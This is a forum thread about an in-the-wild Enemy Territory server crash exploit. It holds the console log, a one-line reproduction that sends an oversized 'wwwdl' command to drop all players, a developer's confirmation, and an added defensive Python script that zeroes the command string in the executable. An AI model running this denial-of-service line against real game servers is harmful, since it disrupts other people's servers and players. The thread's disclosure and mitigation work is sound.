Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
 Post subject: ET server exploit in the wild
PostPosted: 23 Jul 2010 12:28 

Joined: 23 Jul 2010 12:20
Posts: 1
hello, today a friend of mine who runs a popular ET server in Italy experienced an exploit which dropped all players from the server.
he read the console log and saw this:
Code:
SV_WWWDownload: unexpected wwwdl '\nNo vote in progress.\nClientConnect: 0\nWARNING: bad command byte for client 0\nWARNING: bad command byte for client 0\nWARNING: bad command byte for client 0\nWARNING: bad command byte for client 0\nWARNING: bad command byte for client 0\nWARNING: bad command byte for client 0\nWARNING: bad command byte for client 0\nWARNING: bad command byte for client 0\n .. (repeating many times) ..' for client 'ETPlayer'

immediately after this message all players disconnected.
the one responsible for this message (ETPlayer) had a Finnish IP, and has been reported to his ISP kponet.fi.

i looked into it and found a way to reproduce the exploit:
simply write this into a .cfg and /exec it while connected to a server:
Code:
cmd wwwdl aaaaaaaaaaaaaaaaaaaaaa... (1020 times a)


apparently it works in all ET versions and mods.

anyone seen that exploit before? how can i protect my friend's server from this?

thanks.


 Post subject: Re: ET server exploit in the wild
PostPosted: 23 Jul 2010 13:02 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
uhmmm strange, I tested wwwdl weeks ago in CoD4 and nothing bad happened (only the attacker gets disconnected with error message).

while instead I have tested it now on ET using 2 clients and yes, both get disconnected with the "CL_ParseServerMessage: illegible server message 0"


 Post subject: Re: ET server exploit in the wild
PostPosted: 23 Jul 2010 13:04 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
oh right I forgot the "protection" part :)
obviously it would be better to have a real fix but in the meantime you can just overwrite the wwwdl string in the game executable with something else or a series of zeros.
lame but requires no effort
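
The stopgap described in the last post, as an added example that is not part of the original thread or of any ET tool: a Python script that zeroes the `wwwdl` command name in a copy of the executable's bytes without changing the file length. It assumes the name is stored as its own NUL-terminated string directly after another string's terminator; the function names and the sample bytes are constructed for illustration.

```python
import shutil
from pathlib import Path

TARGET = b"wwwdl"  # command name taken from the thread


def find_exact_cstrings(data: bytes, target: bytes = TARGET) -> list[int]:
    """Offsets where `target` is a whole NUL-delimited C string.

    Requiring a NUL on both sides skips longer strings that merely contain
    the word, such as the "unexpected wwwdl" log format string.
    """
    needle = b"\x00" + target + b"\x00"
    offsets, pos = [], data.find(needle)
    while pos != -1:
        offsets.append(pos + 1)            # skip the leading NUL
        pos = data.find(needle, pos + 1)   # +1 so shared NULs still match
    return offsets


def neutralise(data: bytes, target: bytes = TARGET) -> tuple[bytes, list[int]]:
    """Return a same-length copy with each exact match overwritten by zeros."""
    patched = bytearray(data)
    offsets = find_exact_cstrings(data, target)
    for off in offsets:
        patched[off:off + len(target)] = bytes(len(target))
    return bytes(patched), offsets


def patch_file(path: str) -> list[int]:
    """Patch `path` in place after saving an untouched copy as <path>.orig."""
    src = Path(path)
    original = src.read_bytes()
    patched, offsets = neutralise(original)
    if offsets:  # leave the file alone when nothing matched
        shutil.copy2(src, src.with_name(src.name + ".orig"))
        src.write_bytes(patched)
    return offsets


# Constructed sample bytes standing in for an executable's string table.
SAMPLE = (b"\x7fELF\x00vote\x00wwwdl\x00"
          b"SV_WWWDownload: unexpected wwwdl '%s' for client '%s'\n\x00")

if __name__ == "__main__":
    _, hits = neutralise(SAMPLE)
    print("patched offsets:", hits)
```

An empty result from `patch_file` means the assumption about how the string is stored did not hold for that build, and the file is left unmodified.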

